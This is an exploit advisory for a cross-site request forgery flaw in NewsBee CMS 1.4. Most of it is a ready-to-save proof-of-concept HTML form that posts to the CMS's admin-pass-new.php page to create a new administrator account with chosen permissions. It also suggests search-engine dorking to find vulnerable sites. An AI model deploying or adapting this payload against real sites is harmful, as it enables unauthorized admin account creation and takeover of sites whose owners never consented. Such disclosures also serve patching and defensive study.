NewsBee CMS version 1.4 suffers from a cross site request forgery vulnerability.
d36ac134802164e7be83e68a0a14edb0
====================================================================================================================================
| # Title : NewsBee CMS 1.4 CSRF Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 |
| # Dork : N/A |
====================================================================================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine .
[+] save as poc.html .
<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>
<form action="http://codecanyon.nelliwinne.net/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">
<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">
<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">
<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC"> </td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
</tbody></table>
<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">
<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>
<br>
</div>
</div>
</div>
</div>
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================